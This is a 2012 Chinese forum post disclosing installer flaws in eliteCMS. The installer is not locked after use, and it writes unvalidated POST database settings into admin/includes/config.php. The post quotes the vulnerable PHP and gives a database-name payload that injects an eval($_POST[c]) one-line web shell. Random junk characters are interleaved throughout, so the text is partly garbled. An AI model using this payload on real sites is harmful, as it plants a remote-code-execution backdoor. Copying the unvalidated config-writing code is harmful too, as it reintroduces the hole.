eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
0 m2 o+ {7 d' S
# k, J/ i8 N" m+ [/ `6 G另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
8 d: A u% P" ^" i! y) C' u8 i我们来看代码:
# V& A3 ?5 @, L) I
* e. S7 [' c4 \ b/ e" `+ r...* q) n$ `. b* k* R6 K# H C5 \+ M5 P
elseif ($_GET['step'] == "4") {
6 Q. o; F6 U! |' y+ F% a G $file = "../admin/includes/config.php";
3 E9 H2 T2 z& q9 M8 w0 r $write = "<?php\n";
6 v; p$ Z+ G5 q8 `- Q/ ~2 E# j $write .= "/**\n";) d: w$ w- h0 N4 I9 h2 o2 U
$write .= "*\n";
7 `. R" i: `0 g6 w $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";7 e T; R& |; m
...略..., ^( _2 u8 o, t8 L7 q& O
$write .= "*\n";
* U, M3 o1 b3 v3 { $write .= "*/\n";' @4 p: S1 {: r. |6 z
$write .= "\n";
, F4 J2 q: p: U1 s% M$ N* Q, v7 E $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";6 z+ k( R& U' M7 {
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";$ a7 p: \7 m8 h6 \) R
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
( a1 B/ `0 u. m' l7 b2 t( {9 ` $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
9 x5 q+ s U8 y $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";2 d6 @" ]! S) Z- `
$write .= "if (!\$connection) {\n";
0 a# p# \3 ^! ? $write .= " die(\"Database connection failed\" .mysql_error());\n";
7 i/ N- M- P0 w: ] $write .= " \n";
5 w+ J9 H, `9 ` $write .= "} \n";9 g+ |9 ?; x5 X7 C. i4 v
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
1 ^: \/ O8 S& J3 } $write .= "if (!\$db_select) {\n";
2 E' ?) [3 t4 Z+ a' T$ Z+ ^ I $write .= " die(\"Database select failed\" .mysql_error());\n";% \" O0 m7 X* z- X4 \
$write .= " \n";
9 a4 p) ?) m) C8 z% I7 V/ J $write .= "} \n";
4 Q* l' t7 L# A7 Z: Z. ^2 G w $write .= "?>\n";7 F5 c; {4 b7 a4 G" g! r, S
: Y; d0 o. K8 ^3 V7 K
$writer = fopen($file, 'w');
: R0 [2 @$ b! r/ ^7 z...
; ^! t0 b% b( L; B
: T) y9 p$ h# Z& e4 V在看代码:
! F) m3 P! P3 ]1 c D& k
7 [5 j- x; x6 A+ x0 w$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
- s4 Y" W; b( U6 b0 ]: F: q; U* a$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
" H) C3 h( \5 n9 u2 B( w: i$_SESSION['DB_USER'] = $_POST['DB_USER'];4 V+ P) L9 \ \1 j1 b# d9 h
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
& i7 z* k9 n9 [+ e, d1 u
1 b+ p& D+ C. I! ~! n3 w8 Q/ _取值未作任何验证
& N# P: i3 W* J7 a, K如果将数据库名POST数据:1 Y; P) n) @# ?
$ P0 T# l. i, h" ]% }"?><?php eval($_POST[c]);?><?php' C/ u1 e; |- ?4 e; U5 A. f5 u
\( G& M8 }6 _0 ]3 ]4 M4 S' {, h
将导致一句话后门写入/admin/includes/config.php D# O, |6 x6 F! i7 Z! G
|
发表于 2012-11-18 13:59:27
收藏
支持
反对